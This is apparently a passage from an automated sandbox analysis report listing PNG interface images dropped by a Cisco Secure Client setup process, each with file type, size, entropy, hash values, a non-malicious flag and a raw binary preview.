                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nam_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nam_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_umbrella_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_umbrella_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_umbrella_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_vpn_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_vpn_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_vpn_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_ws_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_ws_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_ws_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_help.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
